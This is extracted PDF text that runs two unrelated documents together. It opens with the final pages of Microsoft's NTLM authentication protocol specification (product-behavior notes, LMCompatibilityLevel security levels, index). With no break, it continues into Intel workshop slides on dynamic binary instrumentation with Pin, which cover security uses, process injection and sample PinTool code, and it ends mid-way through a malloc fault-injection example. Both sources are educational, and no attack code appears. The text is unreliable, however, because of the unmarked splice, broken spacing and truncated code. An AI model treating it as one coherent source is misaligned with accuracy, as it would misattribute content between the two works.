<30> Section 3.1.1.1: The default value of this state variable is TRUE. Windows NT Server 4.0 SP3 
does not support providing NTLM instead of LM responses.  
<31> Section 3.1.1.1: The default value of this state variable is FALSE. ClientBlocked  is not 
supported in Windows  NT, Windows  2000, Windows  XP, Windows Server  2003, Windows  Vista, and 
Windows Server  2008.  
<32> Section 3.1.1.1: The defa ult value of this state variable is NULL. ClientBlockExceptions is not 
supported in Windows  NT, Windows  2000, Windows  XP, Windows Server  2003, Windows  Vista, and 
Windows Server  2008.  
<33> Section 3.1.1.1: In Windows  NT, Windows  2000, W indows  XP, Windows Server  2003, 
Windows  Vista, and Windows Server  2008 this variable is set to FALSE. In Windows  7, Windows 
Server  2008 R2, and Windows Home Server v2, this variable is set to TRUE.  
<34> Section 3.1.1.1: In Windows  NT 4.0 and Windows  2000, the maximum lifetime for the 
challenge is 30 minutes. In Windows  XP, Windows Server  2003, Windows  Vista, Windows 
Server  2008, Windows  7, Windows Server  2008 R2, and Windows Home Server v2, the maximum 
lifetime is 36 hours.  
<35> Section 3.1.1.2: Windows exposes these logical parameters to applications through the SSPI 
interface on Windows.  
<36> Section 3.1.1.2: ClientSuppliedTargetName  is not supported in Windows  NT, 
Windows  2000, Windows  XP, Win dows Server  2003, Windows  Vista, and Windows Server  2008.  
<37> Section 3.1.1.2: ClientChannelBindingsUnhashed  is not supported in Windows  NT, 
Windows  2000, Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
 
91 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  <38> Section 3.1.4: This functionality is not supported in Windows  NT, Windows  2000, Windows  XP, 
Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<39> Section 3.1.5.1.1: This functionality is not supported in  Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<40> Section 3.1.5.1.2: Not supported by Windows  NT, Windows  2000, Windows  XP, and Windows 
Server  2003.  
<41> Secti on 3.1.5.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<42> Section 3.1.5.1.2: Not supported in Windows  NT, Windows  2000, Windows  XP, and  Windows 
Server  2003.  
<43> Section 3.1.5.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<44> Section 3.1.5.2: Connec tionless is not supported in Windows  7 or Windows Server  2008 R2. 
<45> Section 3.1.5.2.1: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<46> Section 3.1.5.2.1: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<47> Section 3.1.5.2.1: Not supported by Windows  NT, Windows  2000, Windows  XP, and Windows 
Server  2003.  
<48> Section 3.1.5.2.1: Not supported in Windows  NT, Windows  2000, Windows  XP, and Windows 
Server  2003.  
<49> Section 3.1.5.2.1: This functionality is not suppor ted in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<50> Section 3.2.1.1: The default value of this state variable is FALSE. ServerBlock is supported in 
Windows  7, Windows Server  2008 R2, and Windows Home Server v2.  
<51> Section 3.2.1.1: In Windows  NT, Windows  2000, Windows  XP, Windows Server  2003, 
Windows  Vista, and Windows Server  2008 this variable is set to FALSE. In Windows  7, Windows 
Server  2008 R2, and Wi ndows Home Server v2, this variable is set to TRUE.  
<52> Section 3.2.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<53> Section 3.2.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<54> Section 3.2.5.1.1: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<55> Section 3.2.5.1.1: Windows  NT will set NTLMSSP_NEGOTIATE_TARGET_INFO only if 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY is set. Windows  2000,  Windows  XP, and 
Windows Server  2003 will set NTLMSSP_NEGOTIATE_TARGET_INFO  only if 
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY or NTLMSSP_REQUEST_TARGET is set.  
<56> Section 3.2.5.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
 
92 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  <57> Section 3.2.5.1.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Win dows Server  2008.  
<58> Section 3.2.5.1.2: Not supported in Windows  NT, Windows  2000, Windows  XP, and Windows 
Server  2003.  
<59> Section 3.2.5.1.2: Supported by Windows  NT, Windows  2000 and Windows  XP. 
<60> Section 3.2.5.2: Connectionless is not supported in Windows  7 or Windows Server  2008 R2. 
<61> Section 3.2.5.2.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<62> Section 3.2.5.2.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<63> Section 3.2.5.2.2: Not supported in Windows  NT, Windows  2000, Windows  XP, and Windows 
Server  2003.  
<64> Section 3.2.5.2.2: Supported by Windo ws NT, Windows  2000 and Windows  XP. 
<65> Section 3.2.5.2.2: This functionality is not supported in Windows  NT, Windows  2000, 
Windows  XP, Windows Server  2003, Windows  Vista, and Windows Server  2008.  
<66> Section 3 .3.1: If the client sends a domain that is unknown to the server, the server tries to 
perform the authentication against the local database.  
<67> Section 3.3.2: If the client sends a domain that is unknown to the server, the server tr ies to 
perform the authentication against the local database.  
<68> Section 5.1: NTLM domain considerations are as follows:  
Microsoft DCs determine the minimum security requirements for NTLM authentication between a 
Windows client and the local Windows domain. Based on the minimum security settings in place, the 
DC can either allow or refuse the use of LM, NTLM, or NTLM v2 authentication, and servers can force 
the use of extended session security on all messages between the client and s erver. In a Windows 
domain, the DC controls domain level security settings through the use of Windows Group Policy, 
which replicates security policies to clients and servers throughout the local domain.  
Domain -level security policies dictated by Windows Gr oup Policy must be supported on the local 
system for authentication to take place. During NTLM authentication, clients and servers exchange 
NTLM capability flags that specify what levels of security they are able to support. If either the client 
or server' s level of security support is less than the security policies of the domain, the 
authentication attempt is refused by the computer with the higher level of minimum security 
requirements. This is important for interdomain authentication where differing sec urity policies may 
be enforced on either domain, and the client or server may not be able to support the security 
policies of the other's domain.  
NTLM security levels are as follows:  
The security policies exchanged by the server and client can be set indep endently of the DC 
minimum security requirements dictated by Windows Group Policy. Higher local security policies can 
be exchanged by a client and server in a domain with low minimum security requirements in 
connection -oriented authentication during the ca pability flags exchange. However, during 
connectionless (datagram -oriented) authentication, it is not possible to exchange higher local 
security policies because they are strictly enforced by Windows Group Policy. Local security policies 
that are set indep endently of the DC are subordinate to domain -level security policies for clients 
 
93 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  authenticating to a server on the local domain; therefore, it is not possible to use local -system 
policies that are less secure than domain -level policies.  
Stand -alone servers  that do not have a DC to authenticate clients set their own minimum security 
requirements.  
NTLM security levels determine the minimum security settings allowed on a client, server, or DC to 
authenticate in an NTLM domain. The security levels cannot be mod ified in Windows  NT 4.0 SP3 by 
setting this registry key to one of the following security level values.  
HKEY_LOCAL_MACHINE \System\CurrentControlSet \Control\Lsa\ 
LMCompatibilityLevel  
Security -level descriptions:  
0: Server sends LM and NTLM response and never uses extended session security. Clients use LM 
and NTLM authentication, and never use extended session security. DCs accept LM, NTLM, and NTLM 
v2 authentication.  
1: Servers use NTLM v2 session security if it is negotiated. Clients use LM and NTLM authentication 
and use extended session security if the server supports it. DCs accept LM, NTLM, and NTLM v2 
authentication.  
2: Server sends NTLM response only. Clients use only NTLM authentication and use extended 
session security if the server supports it. DCs accept LM, NTLM, and NTLM v2 authentication.  
3: Server sends NTLM v2 response only. Clients use NTLM v2 authentication and use extended 
session security if the server supports it. DCs accept LM, NTLM, and NTLM v2 authentication.  
4: DCs refuse LM responses. Clients use NTLM authentication and use extended session security if 
the server supports it. DCs refuse LM authentication but accept NTLM and NTLM v2 authentication.  
5: DCs refuse LM and NTLM responses, and accep t only NTLM v2. Clients use NTLM v2 
authentication and use extended session security if the server supports it. DCs refuse NTLM and LM 
authentication, and accept only NTLM v2 authentication.  
 
94 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  8   Change Tracking  
No table of changes is available. The document is either new or has had no changes since its last 
release.  
 
95 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  9   Index  
A 
Abstract data model  
client  41 
server  49 
Applicability  14 
AUTHENTICATE_MESSAGE  53 
AUTHENTICATE_MESSAGE message  22 
Authentication  
NTLMv1  58 
NTLMv2  59 
AV_PAIR message  29 
C 
Call flow  
connectionless  12 
connection -oriented  11 
overview  10 
Capability negotiation  14 
CHALLENGE_MESSAGE ( section 3.1.5.1. 2 45, 
section 3.1.5.2.1  48, section 3.2.5.2.1  56) 
CHALLENGE_MESSAGE message  19 
Change tracking  94 
Client  
abstract data model  41 
connectionless message processing  48 
connection -oriented message processing  44 
exposed variables  42 
higher -layer triggered events  43 
initialization  43 
internal variables  41 
local events  49 
message processing  44 
sequencing rules  44 
timer events  49 
timer s 43 
Confidentiality  62 
Connectionless  
call flow  12 
message processing - client  48 
message processing - server  56 
Connection -oriented  
call flow  11 
message processing - client  44 
message processing - server  51 
Cryptographic operations reference  85 
D 
Data model - abstract  
client  41 
server  49 
E 
Examples ( section 4 72, section 4.1 72) 
Exposed variables  
client  42 server  50 
F 
Fields - vendor -extensible  14 
G 
Glossary  7 
H 
Higher -layer triggered events  
client  43 
server  50 
I 
Implementer - security considerations  84 
Index of security parameters  84 
Informative references  9 
Initialization  
client  43 
server  50 
Internal variables  
client  41 
server  49 
Introduction  7 
K 
KXKEY ( section 3.4.5 65, section 3.4.5.1  65) 
L 
LM_RESPONSE message  31 
LMv2_RESPONSE message  32 
Local events  
client  49 
server  58 
M 
Message processing  
client  44 
server  51 
Messages  
NTLM 16 
structures  29 
syntax  15 
transport  15 
N 
NEGOTIATE message  33 
NEGOTIATE_MESSAGE ( section 3.1.5.1.1  44, 
section 3.2.5. 1.1 51) 
NEGOTIATE_MESSAGE message  16 
Normative references  8 
 
96 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NTLM authentication call flow  10 
NTLM connectionless call flow  12 
NTLM connection -oriented call flow  11 
NTLM messages  16 
NTLM_RESPONSE message  35 
NTLMheader message  15 
NTLMSSP_MESSAGE_SIGNATURE_EXTENDED_SESS
IONSECURITY message  38 
NTLMSSP_MESSAGE_SIGNATURE_preNTLMv2 
message  38 
NTLMv1  
authentication  58 
overview  58 
NTLMv2  
authentication  59 
overview  58 
NTLMv2_CLIENT_CHALLENGE message  36 
NTLMv2_RESPONSE messag e 37 
O 
Overview (synopsis)  10 
P 
Parameters - security index  84 
Preconditions  14 
Prerequisites  14 
Product behavior  88 
R 
References  
informative  9 
normative  8 
Relationship to other protocols  13 
Response checking  56 
Restriction_Encoding message  30 
S 
SEALKEY ( section 3.4.5 65, section 3.4.5.3  67) 
Security  
implementer considerations  84 
parameter index  84 
session  61 
Sequencing rules  
client  44 
server  51 
Server  
abstract data model  49 
connectionl ess message processing  56 
connection -oriented message processing  51 
exposed variables  50 
higher -layer triggered events  50 
initialization  50 
internal variables  49 
local events  58 
message processing  51 
response checking  56 
sequencing rules  51 
timer events  57 timers  50 
Session security  
confidentiality  62 
integrity  62 
KXKEY ( section 3.4.5 65, section 3.4.5.1  65) 
overview  61 
SEALKEY (section 3.4.5 65, section 3.4.5.3  67) 
signature functions  63 
SIGNKEY ( section 3.4.5 65, section 3.4.5.2  66) 
Signature functions  63 
SIGNKEY ( section 3.4.5 65, section 3.4.5.2  66) 
Standards assignments  14 
Structures  29 
Syntax  15 
T 
Timer events  
client  49 
server  57 
Timers  
client  43 
server  50 
Tracking changes  94 
Transport  15 
Triggered events - higher -layer 
client  43 
server  50 
V 
Variables  
exposed - client  42 
exposed - server  50 
internal - client  41 
internal - server  49 
Vendor -extensible fields  14 
VERSION message  39 
Versioning  14 BINARY INSTRUMENTATION FOR SECURITY PROFESSIONALS  GAL DISKIN / INTEL 
Please Remember to Complete Your Feedback Form 
LEGAL DISCLAIMER INFORMATION IN THIS DOCUMENT IS PROVIDED “AS IS”. NO LICENSE, EXPRESS OR IMPLIED, BY ESTOPPEL OR OTHERWISE, ANY INTELLECTUAL PROPERTY RIGHTS IS GRANTED BY THIS DOCUMENT.  INTEL ASSUMES NO LIABILITY WHATSOEVER AND INTEL DISCLAIMS ANY EXPRESS OR IMPLIED WARRANTY , RELATING TO THIS INFORMATION INCLUDING LIABILITY OR WARRANTIES RELATING TO FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY , OR INFRINGEMENT OF ANY PATENT, COPYRIGHT OR OTHER INTELLECTUAL PROPERTY RIGHT.  Intel and the Intel logo are trademarks of Intel Corporation in the U.S. and other countries.  *Other names and brands may be claimed as the property of others.  Copyright © 2011.  Intel Corporation. 
ALL CODE IN THIS PRESENTATION IS COVERED BY THE FOLLOWING: /*BEGIN_LEGAL  Intel Open Source License  Copyright (c) 2002-2011 Intel Corporation. All rights reserved.   Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:  Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.  Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.  Neither the name of the Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. END_LEGAL */   
WHO AM I » Currently @ Intel • Security researcher  • Evaluation team leader » Formerly a member of the binary instrumentation team @ Intel » Before that a private consultant » Always a hacker » ... Online presence: www.diskin.org, @gal_diskin, LinkedIn, E-mail (yeah, even FB & G+) 
ABOUT THIS WORKSHOP » Intro to DBI and its information security usages » How does DBI work – Intro to a DBI engine (Pin) » InfoSec DBI tools  
INSTRUMENTATION » Source / Compiler Instrumentation » Static Binary Instrumentation » Dynamic Binary Instrumentation 

DBI USAGES What is it good for? 
WHAT NON-SECURITY PEOPLE USE DBI FOR » Simulation / Emulation » Performance analysis » Correctness checking » Memory debugging » Parallel optimization » Call graphs » Collecting code metrics » Automated debugging 
WHAT DO WE WANT TO USE IT FOR? 

GETTING A JOB » Ad is © Rapid7/jduck  

TAINT ANALYSIS » Following tainted data flow through programs  » Transitive property X∈T(Y) ∧ Z∈T(X) è Z∈T(Y) (x<y)∧(z<x)è(z<y) 

TAINT (DATA FLOW) ANALYSIS » Data flow analysis  • Vulnerability research • Privacy  » Malware analysis » Unknown vulnerability detection » Test case generation » ... 

TAINT (DATA FLOW) ANALYSIS » Edgar Barbosa in H2HC 2009 » Flayer » Some programming languages have a taint mode  

CONTROL FLOW ANALYSIS » Call graphs » Code coverage » Examples: • Pincov 

PRIVACY MONITORING » Relies on taint analysis • Source = personal information • Sink = external destination » Examples: • Taintdroid  • Privacy Scope 

KNOWN VULNERABILITY DETECTION » Detect exploitable condition • Double free • Race condition • Dangling pointer • Memory leak 

UNKNOWN VULNERABILITY DETECTION » Detect exploit behavior  • Overwriting a return address • Corruption of meta-data ‒ E.g. Heap descriptors • Execution of user data • Overwrite of function pointers 

VULNERABILITY DETECTION » Examples: • Intel ® Parallel Studio • Determina 

FUZZING / SECURITY TEST CASE GENERATION » Feedback driven fuzzing • Code coverage driven ‒ Corpus distillation • Data coverage driven ‒ Haven’t seen it in the wild • Constraints • Evolutionary fuzzing » Checkpointing » In-memory fuzzing » Event / Fault injection 

FUZZING / SECURITY TEST CASE GENERATION » Examples: • Tavis Ormandy @ HITB’09   • Microsoft SAGE  

AUTOMATED EXPLOIT DEVELOPMENT » Known exploit techniques » SAT/SMT 

AUTOMATED VACCINATIONS » Detecting attacks » Introducing diversity » Adaptive self-regenerative systems » Examples: • Sweeper • GENESIS 

PRE-PATCHING OF VULNERABILITIES » Modify vulnerable binary code  » Insert additional checks » Example: • Determina LiveShield 
REVERSING » De-obfuscation / unpacking » Frequency analysis » SMC analysis » Automated lookup for behavior / functions » Differential analysis / equivalence analysis 

REVERSING » Examples: • Covert debugging / Danny Quist & Valsmith @ BlackHat USA 2007 • Black Box Auditing Adobe Shockwave - Aaron Portnoy & Logan Brown • tartetatintools • Automated detection of cryptographic primitives 
TRANSPARENT DEBUGGING » Hiding from anti-debug techniques » Anti-instrumentation » Anti-anti instrumentation 

BEHAVIOR BASED SECURITY » Creating legit behavior profiles and allowing programs to run as long as they don’t violate those » Alternatively, looking for backdoor / Trojan behavior » Examples: • HTH – Hunting Trojan Horses 

OTHER USAGES » Vulnerability classification » Anti-virus technologies » Forcing security practices • Adding stack cookies • Forcing ASLR » Sandboxing » Forensics 
SECTION SUMMARY » Data & Control flow analysis » Privacy » Vulnerability detection » Fuzzing » Automated exploitation » Reverse engineering & Transparent debugging » Behavior based security » Pre-patching 
INTRO TO A DBI ENGINE AND HOW IT WORKS I told you DBI is wonderful - what’s next? 
BINARY INSTRUMENTATION ENGINES » Pin » DynamoRio » Valgrind » ERESI » Many more... 
PIN & PINTOOLS » Pin – the instrumentation engine • JIT for x86 » PinTool – the instrumentation program » PinTools register hooks on events in the program • Instrumentation routines – called only on the first time something happens • Analysis routines – called every time this object is reached • Callbacks – called whenever a certain event happens 

WHERE TO FIND INFO ABOUT PIN » Website: www.pintool.org  » Mailing list @ Yahoo groups: Pinheads 
A PROGRAM’S BUILDING BLOCKS » Instruction » Basic Block » Trace or Super-block 

PIN INJECTION 
pin  –t inscount.so  – gzip  input.txt Linux Invocation+Injection   gzip input.txt Child (Injector) Pin (Injectee) PinTool that counts application instructions executed, prints Count at end fork exitLoop = FALSE; Ptrace TraceMe while(!exitLoop){} Ptrace Injectee – Injectee Freezes Injectee.exitLoop = TRUE;  execv(gzip); // Injectee Freezes Ptrace continue (unFreezes Injectee) Ptrace Copy (save, gzip.CodeSegment, sizeof(MiniLoader)) PtraceGetContext (gzip.OrigContext) PtraceCopy (gzip.CodeSegment, MiniLoader, sizeof(MiniLoader))  Ptrace continue@MiniLoader (unFreezes Injectee) MiniLoader loads Pin+Tool, allocates Pin stack Kill(SigTrace, Injector): Freezes until Ptrace Cont Execution of Injector resumes after execv(gzip) in Injectee completes  
Ptrace Detach Wait for MiniLoader complete (SigTrace from Injectee)    Pin Code and Data MiniLoader    Pin Code and Data MiniLoader    gzip Code and Data Code to Save  Code to Save  MiniLoader 
Code to Save  Ptrace Copy (gzip.CodeSegment, save, sizeof(MiniLoader)) Ptrace Copy (gzip.pin.stack, gzip.OrigCtxt, sizeof (ctxt)) Ptrace SetContext (gzip.IP=pin, gzip.SP=pin.Stack)  gzip OrigCtxt    Pin Code and Data MiniLoader 
Inscount2.so gzip (Injectee)  Pin stack 
gzip OrigCtxt IP  
PIN EXECUTION 
Starting at first application IP Read a Trace from Application Code Jit it, adding instrumentation code from inscount.dll Encode the trace into the Code Cache Execute Jitted code Execution of Trace ends Call into PINVM.DLL to Jit next trace Pass in app IP of Trace’s target Source Trace exit branch is modified to directly branch to Destination Trace Pin Invocation   gzip.exe input.txt 
Application  Code and Data Application Process System Call Dispatcher Event Dispatcher Thread Dispatcher PINVM.DLL inscount.dll PIN.LIB     Code  Cache NTDLL.DLL Windows kernel CreateProcess (gzip.exe, input.txt, suspended) Launcher PIN.EXE Launcher Process 
Boot Routine + Data: firstAppIp, “Inscount.dll” Load PINVM.DLL  Inject Pin BootRoutine and Data into application Load  inscount.dll and run its main() Start PINVM.DLL running (firstAppIp, “inscount.dll”) 
            pin.exe –t inscount.dll – gzip.exe input.txt Count 258743109 
            
PinTool that counts application instructions executed, prints Count at end Resume at BootRoutine First app IP  
app Ip of Trace’s target  Read a Trace from Application Code Jit it, adding instrumentation code from inscount.dll Encode the jitted trace into the Code Cache 
GetContext(&firstAppIp) SetContext(BootRoutineIp) WriteProcessMemory(BootRoutine, BootData) Decoder Encoder 
SECTION SUMMARY » There are many DBI engines » We’re focusing on Pin in this workshop » We’ve seen how Pin injection into a process works » We’ve seen how it behaves during execution 
INTRO TO PINTOOLS How do you program a DBI engine? 
#include "pin.h"  UINT64 icount = 0;   void docount() { icount++; }  void Instruction(INS ins, void *v)  {     INS_InsertCall(ins, IPOINT_BEFORE,      (AFUNPTR)docount, IARG_END); }  void Fini(INT32 code, void *v)  { std::cerr << "Count " << icount << endl; }  int main(int argc, char * argv[])   {     PIN_Init(argc, argv);     INS_AddInstrumentFunction(Instruction, 0);     PIN_AddFiniFunction(Fini, 0);     PIN_StartProgram();  // Never returns     return 0;                } PINTOOL 101: INSTRUCTION COUNTING 
restore eflags • mov   0x1, %edi • jle   <L1>    switch to pin stack    save registers    call docount    restore regs & stack inc icount inc icount inc icount inc icount • sub $0xff, %edx • cmp %esi, %edx save eflags Jitting time  routine Execution time routine 
PIN COMMAND LINE » Pin -pin_switch1 ... -t pintool.so -tool_switch1 ... -- program program_arg1 ... » Pin provides PinTools with a way to parse the command line using the KNOB class 
HOOKS » The heart of Pin’s approach to instrumentation » Analysis and Instrumentation » Can be placed on various events / objects, e.g: • Instructions • Context switch • Thread creation • Much more...  
INSTRUMENTATION AND ANALYSIS » Instrumentation • Usually defined in the tool “main” • Once per object • Heavy lifting » Analysis • Usually defined in instrumentation routine • Every time the object is accessed • As light as possible 
GRANULARITY » INS – Instruction » BBL – Basic Block » TRACE – Trace » RTN – Routine » SEC – Section » IMG – Binary image 

OTHER INSTRUMENTABLE OBJECTS » Threads » Processes » Exceptions and context changes » Syscalls » ... 
INSTRUCTION COUNTING: TAKE 2  #include "pin.H"  UINT64 icount = 0;  void PIN_FAST_ANALYSIS_CALL docount(INT32 c) { icount += c; }  void Trace(TRACE trace, void *v){// Pin Callback   for(BBL bbl = TRACE_BblHead(trace);        BBL_Valid(bbl);        bbl = BBL_Next(bbl))        BBL_InsertCall(bbl, IPOINT_ANYWHERE,                       (AFUNPTR)docount, IARG_FAST_ANALYSIS_CALL,                       IARG_UINT32, BBL_NumIns(bbl),                       IARG_END); }  void Fini(INT32 code, void *v) {// Pin Callback   fprintf(stderr, "Count %lld\n", icount); }  int main(int argc, char * argv[]) {    PIN_Init(argc, argv);    TRACE_AddInstrumentFunction(Trace, 0);    PIN_AddFiniFunction(Fini, 0);    PIN_StartProgram();    return 0; } 
INSTRUMENTATION POINTS » IPOINT_BEFORE  • Before an instruction or routine » IPOINT_AFTER • Fall through path of an instruction  • Return path of a routine » IPOINT_ANYWHERE • Anywhere inside a trace or a BBL » IPOINT_TAKEN_BRANCH • The taken edge of branch 
INLINING int docount0(int i) {    x[i]++    return x[i]; } Inlinable int docount1(int i) {    if (i == 1000)     x[i]++;    return x[i]; } Not-inlinable 
int docount2(int i) {    x[i]++;    printf(“%d”, i);    return x[i]; } Not-inlinable void docount3() {    for(i=0;i<100;i++)  x[i]++; } Not-inlinable 
INLINING  » –log_inline records inlining decisions in pin.log Analysis function (0x2a9651854c) from mytool.cpp:53  INLINED Analysis function (0x2a9651858a) from mytool.cpp:178 NOT INLINED      The last instruction of the first BBL fetched is not a ret instruction » The disassembly of an un-inlined analysis function 0x0000002a9651858a push rbp  0x0000002a9651858b mov rbp, rsp  0x0000002a9651858e mov rax, qword ptr [rip+0x3ce2b3]  0x0000002a96518595 inc dword ptr [rax]  0x0000002a96518597 mov rax, qword ptr [rip+0x3ce2aa]  0x0000002a9651859e cmp dword ptr [rax], 0xf4240  0x0000002a965185a4 jnz 0x11  » The function could not be inlined because it contains a control-flow changing instruction (other than ret)  
CONDITIONAL INSTRUMENTATION » XXX_InsertIfCall » XXX_InsertThenCall 
LIVENESS ANALYSIS » Not all registers are used by each program » Pin takes control of “dead” registers • Used for both Pin and tools » Pin transparently reassigns registers 

HOW TRANSLATED CODE LOOKS? 
20 0x001de0000 mov r14, 0xc5267d40   //inscount2.docount 58 0x001de000a add  [r14], 0x2       //inscount2.docount   2 0x001de0015 cmp rax, rdx   9 0x001de0018 jz 0x1deffa0 (PIN-VM) //patched in future 52 0x001de001e mov r14, 0xc5267d40   //inscount2.docount  29 0x001de0028 mov  [r15+0x60], rax   57 0x001de002c lahf   37 0x001de002e seto al  50 0x001de0031 mov  [r15+0xd8], ax   30 0x001de0039 mov rax,  [r15+0x60]  12 0x001de003d add  [r14], 0x2        //inscount2.docount 40 0x001de0048 movzx edi, [rax+0x2]  //ecx alloced to edi 22 0x001de004c push 0x77ec4612   //push retaddr  61 0x001de0051 nop   17 0x001de0052 jmp 0x1deffd0 (PIN-VM)//patched in future (      APP IP   2 0x77ec4600 cmp   rax, rdx  22 0x77ec4603 jz    0x77f1eac9  40 0x77ec4609 movzx ecx, [rax+0x2] 37 0x77ec460d call  0x77ef7870  
save status flags Application Trace How many BBLs in this trace? r15 allocated by Pin  Points to  per-thread spill area  Compiler generated code for docount Inlined by Pin r14 allocated by Pin  
SECTION SUMMARY » The “Hello (DBI) World” is instruction counting » There are various levels of granularity we can instrument as well as various points we can instrument in » Instrumentation routines are called once, analysis routines are called every time » Performance is better when working at higher granularity, when your heavy work is done in instrumentation routines and when your code is inline-able or you use conditional instrumentation 
ATTACHING AND DETACHING When we can’t start the process ourselves 
ATTACHING TO A RUNNING PROCESS » Simply add “-pid <PID#>” command line option instead of giving a program at the end of command line • pin –pid 12345 –t MyTool.so » Related APIs: • PIN_IsAttaching • IMG_AddInstrumentFunction • PIN_AddApplicationStartFunction 
DETACHING » Pin can also detach from the application » Related APIs: • PIN_Detach • PIN_AddDetachFunction 
SYMBOLS, FUNCTIONS & PROBES We don’t want to concentrate on instructions all the time. 
SYMBOLS » Function symbols » Debug symbols » Stripped executables » Init APIs: • PIN_InitSymbols • PIN_InitSymbolsAlt 
» SYM_Next » SYM_Prev  » SYM_Name  » SYM_Invalid » SYM_Valid  » SYM_Dynamic  » SYM_IFunc  » SYM_Value  » SYM_Index » SYM_Address » PIN_UndecorateSymbolName SYMBOL API 
BACK TO THE SOURCE LINE » PIN_GetSourceLocation  (      ADDRINT   address,   INT32 *   column,   INT32 *   line,   string *   fileName ) 
FUNCTION REPLACEMENT » RTN_Replace • Replace app function with tool function » RTN_ReplaceSignature • Replace function and modify its signature » PIN_CallApplicationFunction • Call the application function and JIT it 
PROBE MODE » JIT Mode • Code translated and translation is executed • Flexible, slower, robust, common » Probe Mode • Original code is executed with “probes”  • Faster, less flexible, less robust 

PROBE SIZE Entry point overwritten with probe: 0x400113d4:  jmp    0x41481064    0x400113d9:  push   %ebx  Copy of entry point with original bytes: 0x50000004:   push   %ebp 0x50000005:   mov    %esp,%ebp 0x50000007:   push   %edi 0x50000008:   push   %esi 0x50000009:   jmp     0x400113d9 
0x41481064:   push   %ebp       // tool wrapper func ::::::::::::::::::::  0x414827fe:   call 0x50000004  // call original func Original function entry point: 0x400113d4:  push   %ebp 0x400113d5:  mov    %esp,%ebp 0x400113d7:  push   %edi 0x400113d8:  push   %esi 0x400113d9:  push   %ebx  
OUT OF MEMORY FAULT INJECTION » The following example will show how to use probe mode to randomly inject out of memory errors into programs  
#include "pin.H" #include <time.h> #include <iostream> // Injected failure “frequency” #define FAIL_FREQ 100    typedef VOID * ( *FP_MALLOC )( size_t );  // This is the malloc replacement routine. VOID * NewMalloc( FP_MALLOC orgFuncptr, UINT32 arg0 ) {  if ( (rand() % FAIL_FREQ) == 1 )   {   return NULL; //force fault  }  return orgFuncptr( arg0 ); //call real malloc and return value } 
